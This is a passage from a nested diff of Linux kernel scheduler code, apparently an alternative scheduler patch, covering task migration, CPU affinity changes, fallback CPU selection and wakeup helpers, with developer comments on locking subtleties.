-+	 * HOWEVER, it magically works, because ttwu() is the only code that
-+	 * accesses these variables under p->pi_lock and only does so after
-+	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
-+	 * before finish_task().
-+	 *
-+	 * XXX do further audits, this smells like something putrid.
-+	 */
-+	SCHED_WARN_ON(!p->on_cpu);
-+	p->cpus_ptr = new_mask;
-+}
-+
-+void migrate_disable(void)
-+{
-+	struct task_struct *p = current;
-+	int cpu;
-+
-+	if (p->migration_disabled) {
-+		p->migration_disabled++;
-+		return;
-+	}
-+
-+	preempt_disable();
-+	cpu = smp_processor_id();
-+	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
-+		cpu_rq(cpu)->nr_pinned++;
-+		p->migration_disabled = 1;
-+		p->migration_flags &= ~MDF_FORCE_ENABLED;
-+
-+		/*
-+		 * Violates locking rules! see comment in __do_set_cpus_ptr().
-+		 */
-+		if (p->cpus_ptr == &p->cpus_mask)
-+			__do_set_cpus_ptr(p, cpumask_of(cpu));
-+	}
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_disable);
-+
-+void migrate_enable(void)
-+{
-+	struct task_struct *p = current;
-+
-+	if (0 == p->migration_disabled)
-+		return;
-+
-+	if (p->migration_disabled > 1) {
-+		p->migration_disabled--;
-+		return;
-+	}
-+
-+	if (WARN_ON_ONCE(!p->migration_disabled))
-+		return;
-+
-+	/*
-+	 * Ensure stop_task runs either before or after this, and that
-+	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
-+	 */
-+	preempt_disable();
-+	/*
-+	 * Assumption: current should be running on allowed cpu
-+	 */
-+	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
-+	if (p->cpus_ptr != &p->cpus_mask)
-+		__do_set_cpus_ptr(p, &p->cpus_mask);
-+	/*
-+	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
-+	 * regular cpus_mask, otherwise things that race (eg.
-+	 * select_fallback_rq) get confused.
-+	 */
-+	barrier();
-+	p->migration_disabled = 0;
-+	this_rq()->nr_pinned--;
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_enable);
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return rq->nr_pinned;
-+}
-+
-+/*
-+ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
-+ * __set_cpus_allowed_ptr() and select_fallback_rq().
-+ */
-+static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
-+{
-+	/* When not in the task's cpumask, no point in looking further. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/* migrate_disabled() must be allowed to finish. */
-+	if (is_migration_disabled(p))
-+		return cpu_online(cpu);
-+
-+	/* Non kernel threads are not allowed during either online or offline. */
-+	if (!(p->flags & PF_KTHREAD))
-+		return cpu_active(cpu) && task_cpu_possible(cpu, p);
-+
-+	/* KTHREAD_IS_PER_CPU is always allowed. */
-+	if (kthread_is_per_cpu(p))
-+		return cpu_online(cpu);
-+
-+	/* Regular kernel threads don't get to stay during offline. */
-+	if (cpu_dying(cpu))
-+		return false;
-+
-+	/* But are allowed during online. */
-+	return cpu_online(cpu);
-+}
-+
-+/*
-+ * This is how migration works:
-+ *
-+ * 1) we invoke migration_cpu_stop() on the target CPU using
-+ *    stop_one_cpu().
-+ * 2) stopper starts to run (implicitly forcing the migrated thread
-+ *    off the CPU)
-+ * 3) it checks whether the migrated task is still in the wrong runqueue.
-+ * 4) if it's in the wrong runqueue then the migration thread removes
-+ *    it and puts it into the right queue.
-+ * 5) stopper completes and stop_one_cpu() returns and the migration
-+ *    is done.
-+ */
-+
-+/*
-+ * move_queued_task - move a queued task to new rq.
-+ *
-+ * Returns (locked) new rq. Old rq's lock is released.
-+ */
-+static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
-+				   new_cpu)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
-+	dequeue_task(p, rq, 0);
-+	update_sched_preempt_mask(rq);
-+	set_task_cpu(p, new_cpu);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rq = cpu_rq(new_cpu);
-+
-+	raw_spin_lock(&rq->lock);
-+	WARN_ON_ONCE(task_cpu(p) != new_cpu);
-+	sched_task_sanity_check(p, rq);
-+	enqueue_task(p, rq, 0);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+	check_preempt_curr(rq);
-+
-+	return rq;
-+}
-+
-+struct migration_arg {
-+	struct task_struct *task;
-+	int dest_cpu;
-+};
-+
-+/*
-+ * Move (not current) task off this CPU, onto the destination CPU. We're doing
-+ * this because either it can't run here any more (set_cpus_allowed()
-+ * away from this CPU, or CPU going down), or because we're
-+ * attempting to rebalance this task on exec (sched_exec).
-+ *
-+ * So we race with normal scheduler movements, but that's OK, as long
-+ * as the task is no longer on this CPU.
-+ */
-+static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
-+				 dest_cpu)
-+{
-+	/* Affinity changed (again). */
-+	if (!is_cpu_allowed(p, dest_cpu))
-+		return rq;
-+
-+	update_rq_clock(rq);
-+	return move_queued_task(rq, p, dest_cpu);
-+}
-+
-+/*
-+ * migration_cpu_stop - this will be executed by a highprio stopper thread
-+ * and performs thread migration by bumping thread off CPU then
-+ * 'pushing' onto another runqueue.
-+ */
-+static int migration_cpu_stop(void *data)
-+{
-+	struct migration_arg *arg = data;
-+	struct task_struct *p = arg->task;
-+	struct rq *rq = this_rq();
-+	unsigned long flags;
-+
-+	/*
-+	 * The original target CPU might have gone down and we might
-+	 * be on another CPU but it doesn't matter.
-+	 */
-+	local_irq_save(flags);
-+	/*
-+	 * We need to explicitly wake pending tasks before running
-+	 * __migrate_task() such that we will not miss enforcing cpus_ptr
-+	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
-+	 */
-+	flush_smp_call_function_queue();
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+	/*
-+	 * If task_rq(p) != rq, it cannot be migrated here, because we're
-+	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
-+	 * we're holding p->pi_lock.
-+	 */
-+	if (task_rq(p) == rq && task_on_rq_queued(p))
-+		rq = __migrate_task(rq, p, arg->dest_cpu);
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	return 0;
-+}
-+
-+static inline void
-+set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	cpumask_copy(&p->cpus_mask, new_mask);
-+	p->nr_cpus_allowed = cpumask_weight(new_mask);
-+}
-+
-+static void
-+__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	lockdep_assert_held(&p->pi_lock);
-+	set_cpus_allowed_common(p, new_mask);
-+}
-+
-+void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	__do_set_cpus_allowed(p, new_mask);
-+}
-+
-+int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
-+		      int node)
-+{
-+	if (!src->user_cpus_ptr)
-+		return 0;
-+
-+	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
-+	if (!dst->user_cpus_ptr)
-+		return -ENOMEM;
-+
-+	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
-+	return 0;
-+}
-+
-+static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = NULL;
-+
-+	swap(p->user_cpus_ptr, user_mask);
-+
-+	return user_mask;
-+}
-+
-+void release_user_cpus_ptr(struct task_struct *p)
-+{
-+	kfree(clear_user_cpus_ptr(p));
-+}
-+
-+#endif
-+
-+/**
-+ * task_curr - is this task currently executing on a CPU?
-+ * @p: the task in question.
-+ *
-+ * Return: 1 if the task is currently executing. 0 otherwise.
-+ */
-+inline int task_curr(const struct task_struct *p)
-+{
-+	return cpu_curr(task_cpu(p)) == p;
-+}
-+
-+#ifdef CONFIG_SMP
-+/*
-+ * wait_task_inactive - wait for a thread to unschedule.
-+ *
-+ * Wait for the thread to block in any of the states set in @match_state.
-+ * If it changes, i.e. @p might have woken up, then return zero.  When we
-+ * succeed in waiting for @p to be off its CPU, we return a positive number
-+ * (its total switch count).  If a second call a short while later returns the
-+ * same number, the caller can be sure that @p has remained unscheduled the
-+ * whole time.
-+ *
-+ * The caller must ensure that the task *will* unschedule sometime soon,
-+ * else this function might spin for a *long* time. This function can't
-+ * be called with interrupts off, or it may introduce deadlock with
-+ * smp_call_function() if an IPI is sent by the same process we are
-+ * waiting to become inactive.
-+ */
-+unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
-+{
-+	unsigned long flags;
-+	bool running, on_rq;
-+	unsigned long ncsw;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+
-+		/*
-+		 * If the task is actively running on another CPU
-+		 * still, just relax and busy-wait without holding
-+		 * any locks.
-+		 *
-+		 * NOTE! Since we don't hold any locks, it's not
-+		 * even sure that "rq" stays as the right runqueue!
-+		 * But we don't care, since this will return false
-+		 * if the runqueue has changed and p is actually now
-+		 * running somewhere else!
-+		 */
-+		while (task_on_cpu(p) && p == rq->curr) {
-+			if (!(READ_ONCE(p->__state) & match_state))
-+				return 0;
-+			cpu_relax();
-+		}
-+
-+		/*
-+		 * Ok, time to look more closely! We need the rq
-+		 * lock now, to be *sure*. If we're wrong, we'll
-+		 * just go back and repeat.
-+		 */
-+		task_access_lock_irqsave(p, &lock, &flags);
-+		trace_sched_wait_task(p);
-+		running = task_on_cpu(p);
-+		on_rq = p->on_rq;
-+		ncsw = 0;
-+		if (READ_ONCE(p->__state) & match_state)
-+			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
-+		task_access_unlock_irqrestore(p, lock, &flags);
-+
-+		/*
-+		 * If it changed from the expected state, bail out now.
-+		 */
-+		if (unlikely(!ncsw))
-+			break;
-+
-+		/*
-+		 * Was it really running after all now that we
-+		 * checked with the proper locks actually held?
-+		 *
-+		 * Oops. Go back and try again..
-+		 */
-+		if (unlikely(running)) {
-+			cpu_relax();
-+			continue;
-+		}
-+
-+		/*
-+		 * It's not enough that it's not actively running,
-+		 * it must be off the runqueue _entirely_, and not
-+		 * preempted!
-+		 *
-+		 * So if it was still runnable (but just not actively
-+		 * running right now), it's preempted, and we should
-+		 * yield - it could be a while.
-+		 */
-+		if (unlikely(on_rq)) {
-+			ktime_t to = NSEC_PER_SEC / HZ;
-+
-+			set_current_state(TASK_UNINTERRUPTIBLE);
-+			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
-+			continue;
-+		}
-+
-+		/*
-+		 * Ahh, all good. It wasn't running, and it wasn't
-+		 * runnable, which means that it will never become
-+		 * running in the future either. We're all done!
-+		 */
-+		break;
-+	}
-+
-+	return ncsw;
-+}
-+
-+/***
-+ * kick_process - kick a running thread to enter/exit the kernel
-+ * @p: the to-be-kicked thread
-+ *
-+ * Cause a process which is running on another CPU to enter
-+ * kernel-mode, without any delay. (to get signals handled.)
-+ *
-+ * NOTE: this function doesn't have to take the runqueue lock,
-+ * because all it wants to ensure is that the remote task enters
-+ * the kernel. If the IPI races and the task has been migrated
-+ * to another CPU then no harm is done and the purpose has been
-+ * achieved as well.
-+ */
-+void kick_process(struct task_struct *p)
-+{
-+	int cpu;
-+
-+	preempt_disable();
-+	cpu = task_cpu(p);
-+	if ((cpu != smp_processor_id()) && task_curr(p))
-+		smp_send_reschedule(cpu);
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(kick_process);
-+
-+/*
-+ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
-+ *
-+ * A few notes on cpu_active vs cpu_online:
-+ *
-+ *  - cpu_active must be a subset of cpu_online
-+ *
-+ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
-+ *    see __set_cpus_allowed_ptr(). At this point the newly online
-+ *    CPU isn't yet part of the sched domains, and balancing will not
-+ *    see it.
-+ *
-+ *  - on cpu-down we clear cpu_active() to mask the sched domains and
-+ *    avoid the load balancer to place new tasks on the to be removed
-+ *    CPU. Existing tasks will remain running there and will be taken
-+ *    off.
-+ *
-+ * This means that fallback selection must not select !active CPUs.
-+ * And can assume that any active CPU must be online. Conversely
-+ * select_task_rq() below may allow selection of !active CPUs in order
-+ * to satisfy the above rules.
-+ */
-+static int select_fallback_rq(int cpu, struct task_struct *p)
-+{
-+	int nid = cpu_to_node(cpu);
-+	const struct cpumask *nodemask = NULL;
-+	enum { cpuset, possible, fail } state = cpuset;
-+	int dest_cpu;
-+
-+	/*
-+	 * If the node that the CPU is on has been offlined, cpu_to_node()
-+	 * will return -1. There is no CPU on the node, and we should
-+	 * select the CPU on the other node.
-+	 */
-+	if (nid != -1) {
-+		nodemask = cpumask_of_node(nid);
-+
-+		/* Look for allowed, online CPU in same node. */
-+		for_each_cpu(dest_cpu, nodemask) {
-+			if (is_cpu_allowed(p, dest_cpu))
-+				return dest_cpu;
-+		}
-+	}
-+
-+	for (;;) {
-+		/* Any allowed, online CPU? */
-+		for_each_cpu(dest_cpu, p->cpus_ptr) {
-+			if (!is_cpu_allowed(p, dest_cpu))
-+				continue;
-+			goto out;
-+		}
-+
-+		/* No more Mr. Nice Guy. */
-+		switch (state) {
-+		case cpuset:
-+			if (cpuset_cpus_allowed_fallback(p)) {
-+				state = possible;
-+				break;
-+			}
-+			fallthrough;
-+		case possible:
-+			/*
-+			 * XXX When called from select_task_rq() we only
-+			 * hold p->pi_lock and again violate locking order.
-+			 *
-+			 * More yuck to audit.
-+			 */
-+			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
-+			state = fail;
-+			break;
-+
-+		case fail:
-+			BUG();
-+			break;
-+		}
-+	}
-+
-+out:
-+	if (state != cpuset) {
-+		/*
-+		 * Don't tell them about moving exiting tasks or
-+		 * kernel threads (both mm NULL), since they never
-+		 * leave kernel.
-+		 */
-+		if (p->mm && printk_ratelimit()) {
-+			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
-+					task_pid_nr(p), p->comm, cpu);
-+		}
-+	}
-+
-+	return dest_cpu;
-+}
-+
-+static inline void
-+sched_preempt_mask_flush(cpumask_t *mask, int prio)
-+{
-+	int cpu;
-+
-+	cpumask_copy(mask, sched_idle_mask);
-+
-+	for_each_cpu_not(cpu, mask) {
-+		if (prio < cpu_rq(cpu)->prio)
-+			cpumask_set_cpu(cpu, mask);
-+	}
-+}
-+
-+static inline int
-+preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
-+{
-+	int task_prio = task_sched_prio(p);
-+	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
-+	int pr = atomic_read(&sched_prio_record);
-+
-+	if (pr != task_prio) {
-+		sched_preempt_mask_flush(mask, task_prio);
-+		atomic_set(&sched_prio_record, task_prio);
-+	}
-+
-+	return cpumask_and(preempt_mask, allow_mask, mask);
-+}
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	cpumask_t allow_mask, mask;
-+
-+	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
-+		return select_fallback_rq(task_cpu(p), p);
-+
-+	if (
-+#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
-+#endif
-+	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
-+	    preempt_mask_check(p, &allow_mask, &mask))
-+		return best_mask_cpu(task_cpu(p), &mask);
-+
-+	return best_mask_cpu(task_cpu(p), &allow_mask);
-+}
-+
-+void sched_set_stop_task(int cpu, struct task_struct *stop)
-+{
-+	static struct lock_class_key stop_pi_lock;
-+	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
-+	struct sched_param start_param = { .sched_priority = 0 };
-+	struct task_struct *old_stop = cpu_rq(cpu)->stop;
-+
-+	if (stop) {
-+		/*
-+		 * Make it appear like a SCHED_FIFO task, its something
-+		 * userspace knows about and won't get confused about.
-+		 *
-+		 * Also, it will make PI more or less work without too
-+		 * much confusion -- but then, stop work should not
-+		 * rely on PI working anyway.
-+		 */
-+		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
-+
-+		/*
-+		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
-+		 * adjust the effective priority of a task. As a result,
-+		 * rt_mutex_setprio() can trigger (RT) balancing operations,
-+		 * which can then trigger wakeups of the stop thread to push
-+		 * around the current task.
-+		 *
-+		 * The stop task itself will never be part of the PI-chain, it
-+		 * never blocks, therefore that ->pi_lock recursion is safe.
-+		 * Tell lockdep about this by placing the stop->pi_lock in its
-+		 * own class.
-+		 */
-+		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
-+	}
-+
-+	cpu_rq(cpu)->stop = stop;
-+
-+	if (old_stop) {
-+		/*
-+		 * Reset it back to a normal scheduling policy so that
-+		 * it can die in pieces.
-+		 */
-+		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
-+	}
-+}
-+
-+static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
-+			    raw_spinlock_t *lock, unsigned long irq_flags)
-+{
-+	/* Can the task run on the task's current CPU? If so, we're done */
-+	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
-+		if (p->migration_disabled) {
-+			if (likely(p->cpus_ptr != &p->cpus_mask))
-+				__do_set_cpus_ptr(p, &p->cpus_mask);
-+			p->migration_disabled = 0;
-+			p->migration_flags |= MDF_FORCE_ENABLED;
-+			/* When p is migrate_disabled, rq->lock should be held */
-+			rq->nr_pinned--;
-+		}
-+
-+		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
-+			struct migration_arg arg = { p, dest_cpu };
-+
-+			/* Need help from migration thread: drop lock and wait. */
-+			__task_access_unlock(p, lock);
-+			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+			return 0;
-+		}
-+		if (task_on_rq_queued(p)) {
-+			/*
-+			 * OK, since we're going to drop the lock immediately
-+			 * afterwards anyway.
-+			 */
-+			update_rq_clock(rq);
-+			rq = move_queued_task(rq, p, dest_cpu);
-+			lock = &rq->lock;
-+		}
-+	}
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	return 0;
-+}
-+
-+static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
-+					 const struct cpumask *new_mask,
-+					 u32 flags,
-+					 struct rq *rq,
-+					 raw_spinlock_t *lock,
-+					 unsigned long irq_flags)
-+{
-+	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
-+	const struct cpumask *cpu_valid_mask = cpu_active_mask;
-+	bool kthread = p->flags & PF_KTHREAD;
-+	struct cpumask *user_mask = NULL;
-+	int dest_cpu;
-+	int ret = 0;
-+
-+	if (kthread || is_migration_disabled(p)) {
-+		/*
-+		 * Kernel threads are allowed on online && !active CPUs,
-+		 * however, during cpu-hot-unplug, even these might get pushed
-+		 * away if not KTHREAD_IS_PER_CPU.
-+		 *
-+		 * Specifically, migration_disabled() tasks must not fail the
-+		 * cpumask_any_and_distribute() pick below, esp. so on
-+		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
-+		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
-+		 */
-+		cpu_valid_mask = cpu_online_mask;
-+	}
-+
-+	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	/*
-+	 * Must re-check here, to close a race against __kthread_bind(),
-+	 * sched_setaffinity() is not guaranteed to observe the flag.
-+	 */
-+	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	if (cpumask_equal(&p->cpus_mask, new_mask))
-+		goto out;
-+
-+	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
-+	if (dest_cpu >= nr_cpu_ids) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	__do_set_cpus_allowed(p, new_mask);
-+
-+	if (flags & SCA_USER)
-+		user_mask = clear_user_cpus_ptr(p);
-+
-+	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
-+
-+	kfree(user_mask);
-+
-+	return ret;
-+
-+out:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+
-+	return ret;
-+}
-+
-+/*
-+ * Change a given task's CPU affinity. Migrate the thread to a
-+ * proper CPU and schedule it away if the CPU it's executing on
-+ * is removed from the allowed bitmask.
-+ *
-+ * NOTE: the caller must have a valid reference to the task, the
-+ * task must not exit() & deallocate itself prematurely. The
-+ * call is not atomic; no spinlocks may be held.
-+ */
-+static int __set_cpus_allowed_ptr(struct task_struct *p,
-+				  const struct cpumask *new_mask, u32 flags)
-+{
-+	unsigned long irq_flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
-+}
-+
-+int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	return __set_cpus_allowed_ptr(p, new_mask, 0);
-+}
-+EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
-+
-+/*
-+ * Change a given task's CPU affinity to the intersection of its current
-+ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
-+ * and pointing @p->user_cpus_ptr to a copy of the old mask.
-+ * If the resulting mask is empty, leave the affinity unchanged and return
-+ * -EINVAL.
-+ */
-+static int restrict_cpus_allowed_ptr(struct task_struct *p,
-+				     struct cpumask *new_mask,
-+				     const struct cpumask *subset_mask)
-+{
-+	struct cpumask *user_mask = NULL;
-+	unsigned long irq_flags;
-+	raw_spinlock_t *lock;
-+	struct rq *rq;
-+	int err;
-+
-+	if (!p->user_cpus_ptr) {
-+		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
-+		if (!user_mask)
-+			return -ENOMEM;
-+	}
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
-+		err = -EINVAL;
-+		goto err_unlock;
-+	}
-+
-+	/*
-+	 * We're about to butcher the task affinity, so keep track of what
-+	 * the user asked for in case we're able to restore it later on.
-+	 */
-+	if (user_mask) {
-+		cpumask_copy(user_mask, p->cpus_ptr);
-+		p->user_cpus_ptr = user_mask;
-+	}
-+
-+	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
-+
-+err_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	kfree(user_mask);
-+	return err;
-+}
-+
-+/*
-+ * Restrict the CPU affinity of task @p so that it is a subset of
-+ * task_cpu_possible_mask() and point @p->user_cpu_ptr to a copy of the
-+ * old affinity mask. If the resulting mask is empty, we warn and walk
-+ * up the cpuset hierarchy until we find a suitable mask.
-+ */
-+void force_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	cpumask_var_t new_mask;
-+	const struct cpumask *override_mask = task_cpu_possible_mask(p);
-+
-+	alloc_cpumask_var(&new_mask, GFP_KERNEL);
-+
-+	/*
-+	 * __migrate_task() can fail silently in the face of concurrent
-+	 * offlining of the chosen destination CPU, so take the hotplug
-+	 * lock to ensure that the migration succeeds.
-+	 */
-+	cpus_read_lock();
-+	if (!cpumask_available(new_mask))
-+		goto out_set_mask;
-+
-+	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
-+		goto out_free_mask;
-+
-+	/*
-+	 * We failed to find a valid subset of the affinity mask for the
-+	 * task, so override it based on its cpuset hierarchy.
-+	 */
-+	cpuset_cpus_allowed(p, new_mask);
-+	override_mask = new_mask;
-+
-+out_set_mask:
-+	if (printk_ratelimit()) {
-+		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
-+				task_pid_nr(p), p->comm,
-+				cpumask_pr_args(override_mask));
-+	}
-+
-+	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
-+out_free_mask:
-+	cpus_read_unlock();
-+	free_cpumask_var(new_mask);
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
-+
-+/*
-+ * Restore the affinity of a task @p which was previously restricted by a
-+ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
-+ * @p->user_cpus_ptr.
-+ *
-+ * It is the caller's responsibility to serialise this with any calls to
-+ * force_compatible_cpus_allowed_ptr(@p).
-+ */
-+void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = p->user_cpus_ptr;
-+	unsigned long flags;
-+
-+	/*
-+	 * Try to restore the old affinity mask. If this fails, then
-+	 * we free the mask explicitly to avoid it being inherited across
-+	 * a subsequent fork().
-+	 */
-+	if (!user_mask || !__sched_setaffinity(p, user_mask))
-+		return;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	user_mask = clear_user_cpus_ptr(p);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	kfree(user_mask);
-+}
-+
-+#else /* CONFIG_SMP */
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+static inline int
-+__set_cpus_allowed_ptr(struct task_struct *p,
-+		       const struct cpumask *new_mask, u32 flags)
-+{
-+	return set_cpus_allowed_ptr(p, new_mask);
-+}
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return false;
-+}
-+
-+#endif /* !CONFIG_SMP */
-+
-+static void
-+ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq;
-+
-+	if (!schedstat_enabled())
-+		return;
-+
-+	rq = this_rq();
-+
-+#ifdef CONFIG_SMP
-+	if (cpu == rq->cpu) {
-+		__schedstat_inc(rq->ttwu_local);
-+		__schedstat_inc(p->stats.nr_wakeups_local);
-+	} else {
-+		/** Alt schedule FW ToDo:
-+		 * How to do ttwu_wake_remote
-+		 */
-+	}
-+#endif /* CONFIG_SMP */
-+
-+	__schedstat_inc(rq->ttwu_count);
-+	__schedstat_inc(p->stats.nr_wakeups);
-+}
-+
-+/*
-+ * Mark the task runnable and perform wakeup-preemption.
-+ */
-+static inline void
-+ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	check_preempt_curr(rq);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	trace_sched_wakeup(p);
-+}
-+
-+static inline void
-+ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	if (p->sched_contributes_to_load)
-+		rq->nr_uninterruptible--;
-+
-+	if (
-+#ifdef CONFIG_SMP
-+	    !(wake_flags & WF_MIGRATED) &&
-+#endif
-+	    p->in_iowait) {
-+		delayacct_blkio_end(p);
-+		atomic_dec(&task_rq(p)->nr_iowait);
-+	}
-+
-+	activate_task(p, rq);
-+	ttwu_do_wakeup(rq, p, 0);
-+}
-+
-+/*
-+ * Consider @p being inside a wait loop:
-+ *
-+ *   for (;;) {
-+ *      set_current_state(TASK_UNINTERRUPTIBLE);
-+ *
-+ *      if (CONDITION)
-+ *         break;
-+ *
-+ *      schedule();
-+ *   }
-+ *   __set_current_state(TASK_RUNNING);
-+ *
-+ * between set_current_state() and schedule(). In this case @p is still
-+ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
-+ * an atomic manner.
-+ *
-+ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
-+ * then schedule() must still happen and p->state can be changed to
-+ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
-+ * need to do a full wakeup with enqueue.
-+ *
-+ * Returns: %true when the wakeup is done,
-+ *          %false otherwise.
-+ */
-+static int ttwu_runnable(struct task_struct *p, int wake_flags)
-+{
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	int ret = 0;
-+
-+	rq = __task_access_lock(p, &lock);
-+	if (task_on_rq_queued(p)) {
-+		/* check_preempt_curr() may use rq clock */
-+		update_rq_clock(rq);
-+		ttwu_do_wakeup(rq, p, wake_flags);
-+		ret = 1;
-+	}
-+	__task_access_unlock(p, lock);
-+
-+	return ret;
-+}
-+
-+#ifdef CONFIG_SMP
-+void sched_ttwu_pending(void *arg)
-+{
-+	struct llist_node *llist = arg;
-+	struct rq *rq = this_rq();
-+	struct task_struct *p, *t;
-+	struct rq_flags rf;
-+
-+	if (!llist)
-+		return;
-+
-+	/*
-+	 * rq::ttwu_pending racy indication of out-standing wakeups.
-+	 * Races such that false-negatives are possible, since they
-+	 * are shorter lived that false-positives would be.
-+	 */
-+	WRITE_ONCE(rq->ttwu_pending, 0);
-+
-+	rq_lock_irqsave(rq, &rf);
-+	update_rq_clock(rq);
-+
-+	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
-+		if (WARN_ON_ONCE(p->on_cpu))
-+			smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
-+			set_task_cpu(p, cpu_of(rq));
-+
